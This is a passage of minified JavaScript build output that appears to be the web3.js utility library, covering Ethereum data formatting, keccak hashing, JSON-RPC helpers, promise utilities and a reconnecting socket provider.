                            switch(a ? "string" == typeof e ? t = (0, u.padLeft)(e, 2 * a) : e instanceof Uint8Array && (t = (0, c.uint8ArrayConcat)(new Uint8Array(a - e.length), e)) : t = e, r.bytes){
                                case i.FMT_BYTES.HEX:
                                    return (0, s.bytesToHex)((0, s.bytesToUint8Array)(t));
                                case i.FMT_BYTES.UINT8ARRAY:
                                    return (0, s.bytesToUint8Array)(t);
                                default:
                                    throw new n.FormatterError(`Invalid format: ${String(r.bytes)}`);
                            }
                        }
                    } catch (t) {
                        return e;
                    }
                    return e;
                }, t.convert = (e, r, n, i, s = [])=>{
                    var a, u;
                    if (!(0, o.isObject)(e) && !Array.isArray(e)) return (0, t.convertScalarValue)(e, null == r ? void 0 : r.format, i);
                    const c = e;
                    for (const [e, l] of Object.entries(c)){
                        n.push(e);
                        const h = d(r, n, s);
                        if ((0, o.isNullish)(h)) delete c[e], n.pop();
                        else if ((0, o.isObject)(l)) (0, t.convert)(l, r, n, i), n.pop();
                        else {
                            if (Array.isArray(l)) {
                                let d = h;
                                if (void 0 !== (null == h ? void 0 : h.oneOf) && h.oneOf.forEach((t, r)=>{
                                    var n, i;
                                    !Array.isArray(null == h ? void 0 : h.items) && ("object" == typeof l[0] && "object" === (null === (n = null == t ? void 0 : t.items) || void 0 === n ? void 0 : n.type) || "string" == typeof l[0] && "object" !== (null === (i = null == t ? void 0 : t.items) || void 0 === i ? void 0 : i.type)) && (d = t, s.push([
                                        e,
                                        r
                                    ]));
                                }), (0, o.isNullish)(null == d ? void 0 : d.items)) {
                                    delete c[e], n.pop();
                                    continue;
                                }
                                if ((0, o.isObject)(d.items) && !(0, o.isNullish)(d.items.format)) {
                                    for(let r = 0; r < l.length; r += 1)c[e][r] = (0, t.convertScalarValue)(l[r], null === (a = null == d ? void 0 : d.items) || void 0 === a ? void 0 : a.format, i);
                                    n.pop();
                                    continue;
                                }
                                if (!Array.isArray(null == d ? void 0 : d.items) && "object" === (null === (u = null == d ? void 0 : d.items) || void 0 === u ? void 0 : u.type)) {
                                    for (const e of l)(0, t.convert)(e, r, n, i, s);
                                    n.pop();
                                    continue;
                                }
                                if (Array.isArray(null == d ? void 0 : d.items)) {
                                    for(let r = 0; r < l.length; r += 1)c[e][r] = (0, t.convertScalarValue)(l[r], d.items[r].format, i);
                                    n.pop();
                                    continue;
                                }
                            }
                            c[e] = (0, t.convertScalarValue)(l, h.format, i), n.pop();
                        }
                    }
                    return c;
                }, t.format = (e, r, i)=>{
                    let s;
                    s = (0, o.isObject)(r) ? (0, a.mergeDeep)({}, r) : Array.isArray(r) ? [
                        ...r
                    ] : r;
                    const u = (0, o.isObject)(e) ? e : o.utils.ethAbiToJsonSchema(e);
                    if (!u.properties && !u.items && !u.format) throw new n.FormatterError("Invalid json schema for formatting");
                    return (0, t.convert)(s, u, [], i);
                };
            },
            3561: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getStorageSlotNumForLongString = t.soliditySha3Raw = t.soliditySha3 = t.encodePacked = t.processSolidityEncodePackedArgs = t.keccak256 = t.keccak256Wrapper = t.sha3Raw = t.sha3 = void 0;
                const n = r(3687), i = r(5487), o = r(5071), s = r(7345), a = r(7086), u = r(2557), c = "0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470";
                t.sha3 = (e)=>{
                    let t;
                    t = "string" == typeof e ? e.startsWith("0x") && (0, s.isHexStrict)(e) ? (0, a.hexToBytes)(e) : (0, i.utf8ToBytes)(e) : e;
                    const r = (0, a.bytesToHex)((0, n.keccak256)(t));
                    return r === c ? void 0 : r;
                }, t.sha3Raw = (e)=>{
                    const r = (0, t.sha3)(e);
                    return (0, s.isNullish)(r) ? c : r;
                }, t.keccak256Wrapper = (e)=>{
                    let t;
                    return t = "bigint" == typeof e || "number" == typeof e ? (0, i.utf8ToBytes)(e.toString()) : Array.isArray(e) ? new Uint8Array(e) : "string" != typeof e || (0, s.isHexStrict)(e) ? (0, a.bytesToUint8Array)(e) : (0, i.utf8ToBytes)(e), (0, a.bytesToHex)((0, n.keccak256)(t));
                }, t.keccak256 = t.keccak256Wrapper;
                const l = (e, t)=>{
                    const r = /^(\d+).*$/.exec(e.slice(t));
                    return r ? parseInt(r[1], 10) : 0;
                }, d = (e)=>e.toString(2).length, h = (e, t)=>{
                    const r = t.toString();
                    if ("string" === e) {
                        if ("string" == typeof t) return (0, a.utf8ToHex)(t);
                        throw new o.InvalidStringError(t);
                    }
                    if ("bool" === e || "boolean" === e) {
                        if ("boolean" == typeof t) return t ? "01" : "00";
                        throw new o.InvalidBooleanError(t);
                    }
                    if ("address" === e) {
                        if (!(0, s.isAddress)(r)) throw new o.InvalidAddressError(r);
                        return r;
                    }
                    const n = ((e)=>e.startsWith("int[") ? `int256${e.slice(3)}` : "int" === e ? "int256" : e.startsWith("uint[") ? `uint256'${e.slice(4)}` : "uint" === e ? "uint256" : e)(e);
                    if (e.startsWith("uint")) {
                        const e = l(n, 4);
                        if (e % 8 || e < 8 || e > 256) throw new o.InvalidSizeError(r);
                        const t = (0, a.toNumber)(r);
                        if (d(t) > e) throw new o.InvalidLargeValueError(r);
                        if (t < BigInt(0)) throw new o.InvalidUnsignedIntegerError(r);
                        return e ? (0, u.leftPad)(t.toString(16), e / 8 * 2) : t.toString(16);
                    }
                    if (e.startsWith("int")) {
                        const t = l(n, 3);
                        if (t % 8 || t < 8 || t > 256) throw new o.InvalidSizeError(e);
                        const i = (0, a.toNumber)(r);
                        if (d(i) > t) throw new o.InvalidLargeValueError(r);
                        return i < BigInt(0) ? (0, u.toTwosComplement)(i.toString(), t / 8 * 2) : t ? (0, u.leftPad)(i.toString(16), t / 4) : i.toString(16);
                    }
                    if ("bytes" === n) {
                        if (r.replace(/^0x/i, "").length % 2 != 0) throw new o.InvalidBytesError(r);
                        return r;
                    }
                    if (e.startsWith("bytes")) {
                        if (r.replace(/^0x/i, "").length % 2 != 0) throw new o.InvalidBytesError(r);
                        const t = l(e, 5);
                        if (!t || t < 1 || t > 64 || t < r.replace(/^0x/i, "").length / 2) throw new o.InvalidBytesError(r);
                        return (0, u.rightPad)(r, 2 * t);
                    }
                    return "";
                };
                t.processSolidityEncodePackedArgs = (e)=>{
                    const [t, r] = ((e)=>{
                        if (Array.isArray(e)) throw new Error("Autodetection of array types is not supported.");
                        let t, r;
                        return "object" == typeof e && ("t" in e || "type" in e) && ("v" in e || "value" in e) ? (t = "t" in e ? e.t : e.type, r = "v" in e ? e.v : e.value) : (t = (0, a.toHex)(e, !0), r = (0, a.toHex)(e), t.startsWith("int") || t.startsWith("uint") || (t = "bytes")), !t.startsWith("int") && !t.startsWith("uint") || "string" != typeof r || /^(-)?0x/i.test(r) || (r = (0, a.toBigInt)(r)), [
                            t,
                            r
                        ];
                    })(e);
                    return Array.isArray(r) ? r.map((e)=>h(t, e).replace("0x", "")).join("") : h(t, r).replace("0x", "");
                }, t.encodePacked = (...e)=>`0x${Array.prototype.slice.call(e).map(t.processSolidityEncodePackedArgs).join("").toLowerCase()}`, t.soliditySha3 = (...e)=>(0, t.sha3)((0, t.encodePacked)(...e)), t.soliditySha3Raw = (...e)=>(0, t.sha3Raw)((0, t.encodePacked)(...e)), t.getStorageSlotNumForLongString = (e)=>(0, t.sha3)(`0x${("number" == typeof e ? e.toString() : e).padStart(64, "0")}`);
            },
            9634: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                }, s = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.jsonRpc = void 0, o(r(7086), t), o(r(4578), t), o(r(3065), t), o(r(3561), t), o(r(4822), t), o(r(2557), t), o(r(7151), t), o(r(3718), t), o(r(9250), t), t.jsonRpc = s(r(9250)), o(r(6982), t), o(r(4108), t), o(r(7717), t), o(r(997), t), o(r(222), t), o(r(7541), t);
            },
            9250: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBatchRequest = t.toBatchPayload = t.toPayload = t.setRequestIdStart = t.isBatchResponse = t.isValidResponse = t.validateResponse = t.isSubscriptionResult = t.isResponseWithNotification = t.isResponseWithError = t.isResponseWithResult = t.isResponseRpcError = void 0;
                const n = r(7345), i = r(5071), o = r(7717);
                let s;
                t.isResponseRpcError = (e)=>{
                    const t = e.error.code;
                    return i.rpcErrorsMap.has(t) || t >= -32099 && t <= -32000;
                }, t.isResponseWithResult = (e)=>!Array.isArray(e) && !!e && "2.0" === e.jsonrpc && "result" in e && (0, n.isNullish)(e.error) && ("number" == typeof e.id || "string" == typeof e.id), t.isResponseWithError = (e)=>!Array.isArray(e) && "2.0" === e.jsonrpc && !!e && (0, n.isNullish)(e.result) && "error" in e && ("number" == typeof e.id || "string" == typeof e.id), t.isResponseWithNotification = (e)=>!(Array.isArray(e) || !e || "2.0" !== e.jsonrpc || (0, n.isNullish)(e.params) || (0, n.isNullish)(e.method)), t.isSubscriptionResult = (e)=>!Array.isArray(e) && !!e && "2.0" === e.jsonrpc && "id" in e && "result" in e, t.validateResponse = (e)=>(0, t.isResponseWithResult)(e) || (0, t.isResponseWithError)(e), t.isValidResponse = (e)=>Array.isArray(e) ? e.every(t.validateResponse) : (0, t.validateResponse)(e), t.isBatchResponse = (e)=>Array.isArray(e) && e.length > 0 && (0, t.isValidResponse)(e), t.setRequestIdStart = (e)=>{
                    s = e;
                }, t.toPayload = (e)=>{
                    var t, r, n, i;
                    return void 0 !== s && (s += 1), {
                        jsonrpc: null !== (t = e.jsonrpc) && void 0 !== t ? t : "2.0",
                        id: null !== (n = null !== (r = e.id) && void 0 !== r ? r : s) && void 0 !== n ? n : (0, o.uuidV4)(),
                        method: e.method,
                        params: null !== (i = e.params) && void 0 !== i ? i : void 0
                    };
                }, t.toBatchPayload = (e)=>e.map((e)=>(0, t.toPayload)(e)), t.isBatchRequest = (e)=>Array.isArray(e) && e.length > 0;
            },
            7151: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.mergeDeep = void 0;
                const n = r(9970), i = r(7345), o = (e)=>!("object" != typeof e || (0, i.isNullish)(e) || Array.isArray(e) || e instanceof n.TypedArray);
                t.mergeDeep = (e, ...r)=>{
                    const s = e;
                    if (!o(s)) return s;
                    for (const e of r)for(const r in e)o(e[r]) ? (s[r] || (s[r] = {}), (0, t.mergeDeep)(s[r], e[r])) : !(0, i.isNullish)(e[r]) && Object.hasOwnProperty.call(e, r) && (Array.isArray(e[r]) || e[r] instanceof n.TypedArray ? s[r] = e[r].slice(0) : s[r] = e[r]);
                    return s;
                };
            },
            3718: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.rejectIfConditionAtInterval = t.rejectIfTimeout = t.pollTillDefined = t.waitWithTimeout = t.isPromise = void 0;
                const i = r(7345);
                function o(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        let n;
                        const i = yield Promise.race([
                            e instanceof Promise ? e : e(),
                            new Promise((e, i)=>{
                                n = setTimeout(()=>r ? i(r) : e(void 0), t);
                            })
                        ]);
                        if (n && clearTimeout(n), i instanceof Error) throw i;
                        return i;
                    });
                }
                t.isPromise = function(e) {
                    return ("object" == typeof e || "function" == typeof e) && "function" == typeof e.then;
                }, t.waitWithTimeout = o, t.pollTillDefined = function(e, t) {
                    return n(this, void 0, void 0, function*() {
                        const r = o(e, t);
                        let s;
                        const a = new Promise((r, a)=>{
                            s = setInterval(()=>{
                                (()=>{
                                    n(this, void 0, void 0, function*() {
                                        try {
                                            const n = yield o(e, t);
                                            (0, i.isNullish)(n) || (clearInterval(s), r(n));
                                        } catch (e) {
                                            clearInterval(s), a(e);
                                        }
                                    });
                                })();
                            }, t);
                        }), u = yield r;
                        return (0, i.isNullish)(u) ? a : (s && clearInterval(s), u);
                    });
                }, t.rejectIfTimeout = function(e, t) {
                    let r;
                    const n = new Promise((n, i)=>{
                        r = setTimeout(()=>{
                            i(t);
                        }, e);
                    });
                    return [
                        r,
                        n
                    ];
                }, t.rejectIfConditionAtInterval = function(e, t) {
                    let r;
                    const i = new Promise((i, o)=>{
                        r = setInterval(()=>{
                            (()=>{
                                n(this, void 0, void 0, function*() {
                                    const t = yield e();
                                    t && (clearInterval(r), o(t));
                                });
                            })();
                        }, t);
                    });
                    return [
                        r,
                        i
                    ];
                };
            },
            4822: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.randomHex = t.randomBytes = void 0;
                const n = r(1341), i = r(7086);
                t.randomBytes = (e)=>(0, n.getRandomBytesSync)(e), t.randomHex = (e)=>(0, i.bytesToHex)((0, t.randomBytes)(e));
            },
            222: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__setModuleDefault || (Object.create ? function(e, t) {
                    Object.defineProperty(e, "default", {
                        enumerable: !0,
                        value: t
                    });
                } : function(e, t) {
                    e.default = t;
                }), o = this && this.__importStar || function(e) {
                    if (e && e.__esModule) return e;
                    var t = {};
                    if (null != e) for(var r in e)"default" !== r && Object.prototype.hasOwnProperty.call(e, r) && n(t, e, r);
                    return i(t, e), t;
                }, s = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SocketProvider = void 0;
                const a = r(5071), u = r(997), c = r(4108), l = r(4578), d = r(6982), h = o(r(9250)), f = {
                    autoReconnect: !0,
                    delay: 5e3,
                    maxAttempts: 5
                };
                class p extends u.Eip1193Provider {
                    constructor(e, t, r){
                        if (super(), this._connectionStatus = "connecting", this._onMessageHandler = this._onMessage.bind(this), this._onOpenHandler = this._onConnect.bind(this), this._onCloseHandler = this._onCloseEvent.bind(this), this._onErrorHandler = this._onError.bind(this), !this._validateProviderPath(e)) throw new a.InvalidClientError(e);
                        this._socketPath = e, this._socketOptions = t, this._reconnectOptions = Object.assign(Object.assign({}, f), null != r ? r : {}), this._pendingRequestsQueue = new Map, this._sentRequestsQueue = new Map, this._init(), this.connect(), this.chunkResponseParser = new c.ChunkResponseParser(this._eventEmitter, this._reconnectOptions.autoReconnect), this.chunkResponseParser.onError(()=>{
                            this._clearQueues();
                        }), this.isReconnecting = !1;
                    }
                    get SocketConnection() {
                        return this._socketConnection;
                    }
                    _init() {
                        this._reconnectAttempts = 0;
                    }
                    connect() {
                        try {
                            this._openSocketConnection(), this._connectionStatus = "connecting", this._addSocketListeners();
                        } catch (e) {
                            if (!this.isReconnecting) throw this._connectionStatus = "disconnected", e && e.message ? new a.ConnectionError(`Error while connecting to ${this._socketPath}. Reason: ${e.message}`) : new a.InvalidClientError(this._socketPath);
                            setImmediate(()=>{
                                this._reconnect();
                            });
                        }
                    }
                    _validateProviderPath(e) {
                        return !!e;
                    }
                    supportsSubscriptions() {
                        return !0;
                    }
                    on(e, t) {
                        this._eventEmitter.on(e, t);
                    }
                    once(e, t) {
                        this._eventEmitter.once(e, t);
                    }
                    removeListener(e, t) {
                        this._eventEmitter.removeListener(e, t);
                    }
                    _onDisconnect(e, t) {
                        this._connectionStatus = "disconnected", super._onDisconnect(e, t);
                    }
                    disconnect(e, t) {
                        const r = null != e ? e : 1e3;
                        this._removeSocketListeners(), "disconnected" !== this.getStatus() && this._closeSocketConnection(r, t), this._onDisconnect(r, t);
                    }
                    removeAllListeners(e) {
                        this._eventEmitter.removeAllListeners(e);
                    }
                    _onError(e) {
                        this.isReconnecting ? this._reconnect() : this._eventEmitter.emit("error", e);
                    }
                    reset() {
                        this._sentRequestsQueue.clear(), this._pendingRequestsQueue.clear(), this._init(), this._removeSocketListeners(), this._addSocketListeners();
                    }
                    _reconnect() {
                        this.isReconnecting || (this.isReconnecting = !0, this._sentRequestsQueue.size > 0 && this._sentRequestsQueue.forEach((e, t)=>{
                            e.deferredPromise.reject(new a.PendingRequestsOnReconnectingError), this._sentRequestsQueue.delete(t);
                        }), this._reconnectAttempts < this._reconnectOptions.maxAttempts ? (this._reconnectAttempts += 1, setTimeout(()=>{
                            this._removeSocketListeners(), this.connect(), this.isReconnecting = !1;
                        }, this._reconnectOptions.delay)) : (this.isReconnecting = !1, this._clearQueues(), this._removeSocketListeners(), this._eventEmitter.emit("error", new a.MaxAttemptsReachedOnReconnectingError(this._reconnectOptions.maxAttempts))));
                    }
                    request(e) {
                        return s(this, void 0, void 0, function*() {
                            if ((0, l.isNullish)(this._socketConnection)) throw new Error("Connection is undefined");
                            "disconnected" === this.getStatus() && this.connect();
                            const t = h.isBatchRequest(e) ? e[0].id : e.id;
                            if (!t) throw new a.Web3WSProviderError("Request Id not defined");
                            if (this._sentRequestsQueue.has(t)) throw new a.RequestAlreadySentError(t);
                            const r = new d.Web3DeferredPromise;
                            r.catch((e)=>{
                                this._eventEmitter.emit("error", e);
                            });
                            const n = {
                                payload: e,
                                deferredPromise: r
                            };
                            if ("connecting" === this.getStatus()) return this._pendingRequestsQueue.set(t, n), n.deferredPromise;
                            this._sentRequestsQueue.set(t, n);
                            try {
                                this._sendToSocket(n.payload);
                            } catch (e) {
                                this._sentRequestsQueue.delete(t), this._eventEmitter.emit("error", e);
                            }
                            return r;
                        });
                    }
                    _onConnect() {
                        this._connectionStatus = "connected", this._reconnectAttempts = 0, super._onConnect(), this._sendPendingRequests();
                    }
                    _sendPendingRequests() {
                        for (const [e, t] of this._pendingRequestsQueue.entries())this._sendToSocket(t.payload), this._pendingRequestsQueue.delete(e), this._sentRequestsQueue.set(e, t);
                    }
                    _onMessage(e) {
                        const t = this._parseResponses(e);
                        if (0 !== t.length) for (const e of t){
                            if (h.isResponseWithNotification(e) && e.method.endsWith("_subscription")) return void this._eventEmitter.emit("message", e);
                            const t = h.isBatchResponse(e) ? e[0].id : e.id, r = this._sentRequestsQueue.get(t);
                            if (!r) return;
                            (h.isBatchResponse(e) || h.isResponseWithResult(e) || h.isResponseWithError(e)) && (this._eventEmitter.emit("message", e), r.deferredPromise.resolve(e)), this._sentRequestsQueue.delete(t);
                        }
                        else this._reconnectOptions.autoReconnect && this._reconnect();
                    }
                    _clearQueues(e) {
                        this._pendingRequestsQueue.size > 0 && this._pendingRequestsQueue.forEach((t, r)=>{
                            t.deferredPromise.reject(new a.ConnectionNotOpenError(e)), this._pendingRequestsQueue.delete(r);
                        }), this._sentRequestsQueue.size > 0 && this._sentRequestsQueue.forEach((t, r)=>{
                            t.deferredPromise.reject(new a.ConnectionNotOpenError(e)), this._sentRequestsQueue.delete(r);
                        }), this._removeSocketListeners();
                    }
                }
                t.SocketProvider = p;
            },
            2557: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.fromTwosComplement = t.toTwosComplement = t.leftPad = t.rightPad = t.padRight = t.padLeft = void 0;
                const n = r(5071), i = r(7345), o = r(7086);
                t.padLeft = (e, t, r = "0")=>"string" == typeof e ? (0, i.isHexStrict)(e) ? i.utils.padLeft(e, t, r) : e.padStart(t, r) : (i.validator.validate([
                        "int"
                    ], [
                        e
                    ]), i.utils.padLeft(e, t, r)), t.padRight = (e, t, r = "0")=>{
                    if ("string" == typeof e && !(0, i.isHexStrict)(e)) return e.padEnd(t, r);
                    i.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    const n = "string" == typeof e && (0, i.isHexStrict)(e) ? e : (0, o.numberToHex)(e), s = n.startsWith("-") ? 3 : 2;
                    return n.padEnd(t + s, r);
                }, t.rightPad = t.padRight, t.leftPad = t.padLeft, t.toTwosComplement = (e, r = 64)=>{
                    i.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    const s = (0, o.toNumber)(e);
                    if (s >= 0) return (0, t.padLeft)((0, o.toHex)(s), r);
                    const a = BigInt(2) ** BigInt(4 * r);
                    if (-s >= a) throw new n.NibbleWidthError(`value: ${e}, nibbleWidth: ${r}`);
                    const u = BigInt(s) + a;
                    return (0, t.padLeft)((0, o.numberToHex)(u), r);
                }, t.fromTwosComplement = (e, t = 64)=>{
                    i.validator.validate([
                        "int"
                    ], [
                        e
                    ]);
                    const r = (0, o.toNumber)(e);
                    if (r < 0) return r;
                    const s = Math.ceil(Math.log(Number(r)) / Math.log(2));
                    if (s > 4 * t) throw new n.NibbleWidthError(`value: "${e}", nibbleWidth: "${t}"`);
                    if (4 * t !== s) return r;
                    const a = BigInt(2) ** (BigInt(t) * BigInt(4));
                    return (0, o.toNumber)(BigInt(r) - a);
                };
            },
            7541: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.uint8ArrayEquals = t.uint8ArrayConcat = void 0, t.uint8ArrayConcat = function(...e) {
                    const t = e.reduce((e, t)=>e + t.length, 0), r = new Uint8Array(t);
                    let n = 0;
                    for (const t of e)r.set(t, n), n += t.length;
                    return r;
                }, t.uint8ArrayEquals = function(e, t) {
                    if (e === t) return !0;
                    if (e.byteLength !== t.byteLength) return !1;
                    for(let r = 0; r < e.byteLength; r += 1)if (e[r] !== t[r]) return !1;
                    return !0;
                };
            },
            7717: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.uuidV4 = void 0;
                const n = r(7086), i = r(4822);
                t.uuidV4 = ()=>{
                    const e = (0, i.randomBytes)(16);
                    e[6] = 15 & e[6] | 64, e[8] = 63 & e[8] | 128;
                    const t = (0, n.bytesToHex)(e);
                    return [
                        t.substring(2, 10),
                        t.substring(10, 14),
                        t.substring(14, 18),
                        t.substring(18, 22),
                        t.substring(22, 34)
                    ].join("-");
                };
            },
            4578: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isNullish = t.compareBlockNumbers = t.isTopicInBloom = t.isTopic = t.isContractAddressInBloom = t.isUserEthereumAddressInBloom = t.isInBloom = t.isBloom = t.isAddress = t.checkAddressCheckSum = t.isHex = t.isHexStrict = void 0;
                const n = r(5071), i = r(7345), o = r(9970);
                t.isHexStrict = i.isHexStrict, t.isHex = i.isHex, t.checkAddressCheckSum = i.checkAddressCheckSum, t.isAddress = i.isAddress, t.isBloom = i.isBloom, t.isInBloom = i.isInBloom, t.isUserEthereumAddressInBloom = i.isUserEthereumAddressInBloom, t.isContractAddressInBloom = i.isContractAddressInBloom, t.isTopic = i.isTopic, t.isTopicInBloom = i.isTopicInBloom, t.compareBlockNumbers = (e, t)=>{
                    const r = "string" == typeof e && (0, i.isBlockTag)(e), s = "string" == typeof t && (0, i.isBlockTag)(t);
                    if (e === t || ("earliest" === e || 0 === e) && ("earliest" === t || 0 === t)) return 0;
                    if ("earliest" === e && t > 0) return -1;
                    if ("earliest" === t && e > 0) return 1;
                    if (r && s) {
                        const r = {
                            [o.BlockTags.EARLIEST]: 1,
                            [o.BlockTags.FINALIZED]: 2,
                            [o.BlockTags.SAFE]: 3,
                            [o.BlockTags.LATEST]: 4,
                            [o.BlockTags.PENDING]: 5
                        };
                        return r[e] < r[t] ? -1 : 1;
                    }
                    if (r && !s || !r && s) throw new n.InvalidBlockError("Cannot compare blocktag with provided non-blocktag input.");
                    const a = BigInt(e), u = BigInt(t);
                    return a < u ? -1 : a === u ? 0 : 1;
                }, t.isNullish = i.isNullish;
            },
            6982: function(e, t, r) {
                "use strict";
                var n, i = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3DeferredPromise = void 0;
                const o = r(5071);
                t.Web3DeferredPromise = class {
                    constructor({ timeout: e, eagerStart: t, timeoutMessage: r } = {
                        timeout: 0,
                        eagerStart: !1,
                        timeoutMessage: "DeferredPromise timed out"
                    }){
                        this[n] = "Promise", this._state = "pending", this._promise = new Promise((e, t)=>{
                            this._resolve = e, this._reject = t;
                        }), this._timeoutMessage = r, this._timeoutInterval = e, t && this.startTimer();
                    }
                    get state() {
                        return this._state;
                    }
                    then(e, t) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.then(e, t);
                        });
                    }
                    catch(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.catch(e);
                        });
                    }
                    finally(e) {
                        return i(this, void 0, void 0, function*() {
                            return this._promise.finally(e);
                        });
                    }
                    resolve(e) {
                        this._resolve(e), this._state = "fulfilled", this._clearTimeout();
                    }
                    reject(e) {
                        this._reject(e), this._state = "rejected", this._clearTimeout();
                    }
                    startTimer() {
                        this._timeoutInterval && this._timeoutInterval > 0 && (this._timeoutId = setTimeout(this._checkTimeout.bind(this), this._timeoutInterval));
                    }
                    _checkTimeout() {
                        "pending" === this._state && this._timeoutId && this.reject(new o.OperationTimeoutError(this._timeoutMessage));
                    }
                    _clearTimeout() {
                        this._timeoutId && clearTimeout(this._timeoutId);
                    }
                }, n = Symbol.toStringTag;
            },
            997: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Eip1193Provider = void 0;
                const i = r(9970), o = r(2699), s = r(9250);
                class a extends i.Web3BaseProvider {
                    constructor(){
                        super(...arguments), this._eventEmitter = new o.EventEmitter, this._chainId = "", this._accounts = [];
                    }
                    _getChainId() {
                        var e;
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.request((0, s.toPayload)({
                                method: "eth_chainId",
                                params: []
                            }));
                            return null !== (e = null == t ? void 0 : t.result) && void 0 !== e ? e : "";
                        });
                    }
                    _getAccounts() {
                        var e;
                        return n(this, void 0, void 0, function*() {
                            const t = yield this.request((0, s.toPayload)({
                                method: "eth_accounts",
                                params: []
                            }));
                            return null !== (e = null == t ? void 0 : t.result) && void 0 !== e ? e : [];
                        });
                    }
                    _onConnect() {
                        Promise.all([
                            this._getChainId().then((e)=>{
                                e !== this._chainId && (this._chainId = e, this._eventEmitter.emit("chainChanged", this._chainId));
                            }).catch((e)=>{
                                console.error(e);
                            }),
                            this._getAccounts().then((e)=>{
                                this._accounts.length === e.length && e.every((t)=>e.includes(t)) || (this._accounts = e, this._onAccountsChanged());
                            }).catch((e)=>{
                                console.error(e);
                            })
                        ]).then(()=>this._eventEmitter.emit("connect", {
                                chainId: this._chainId
                            })).catch((e)=>{
                            console.error(e);
                        });
                    }
                    _onDisconnect(e, t) {
                        this._eventEmitter.emit("disconnect", {
                            code: e,
                            data: t
                        });
                    }
                    _onAccountsChanged() {
                        this._eventEmitter.emit("accountsChanged", this._accounts);
                    }
                }
                t.Eip1193Provider = a;
            },
            1438: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.VALID_ETH_BASE_TYPES = void 0, t.VALID_ETH_BASE_TYPES = [
                    "bool",
                    "int",
                    "uint",
                    "bytes",
